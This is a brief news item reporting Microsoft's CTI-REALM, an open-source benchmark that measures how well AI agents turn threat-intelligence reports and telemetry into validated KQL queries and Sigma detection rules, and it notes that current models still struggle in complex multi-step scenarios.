Microsoft introduces CTI-REALM, a new standard for evaluating AI in cybersecurity

Technologies2026-03-24, 06:44

CTI-REALM is an open-source benchmark designed to assess how well AI agents can perform real-world detection engineering tasks, rather than simply answering theoretical questions.

The model simulates the end-to-end workflow of a SOC analyst: 🔵reads cyber threat intelligence (CTI) reports; 🔵analyzes telemetry data; 🔵writes and refines queries (KQL); 🔵produce validated detection rules (e.g., Sigma).

❗️ The key distinction of CTI-REALM is that it evaluates practical application. It measures whether AI can translate threat intelligence into validated detections and correctly correlate events within complex infrastructures. The benchmark is built on real-world attack scenarios and spans platforms such as Linux, Azure, and Kubernetes. It evaluates not only final outcomes but also the decision-making logic at each stage.

The results show that even advanced models still struggle with consistency in detection tasks, especially in complex scenarios that require deep contextual understanding and multi-step correlation.

For attackers, this suggests a gradual reduction in the attack lifecycle. As detection becomes more automated, blue team response speeds increase and maintaining stealth becomes more difficult, particularly for common techniques. At the same time, a new attack surface emerges in the form of weaknesses in AI decision logic, which adversaries may attempt to exploit.

💬 Discuss

Vendors

Microsoft

Products

Azure

Cti-Realm

Kql

Kubernetes

Linux

Sigma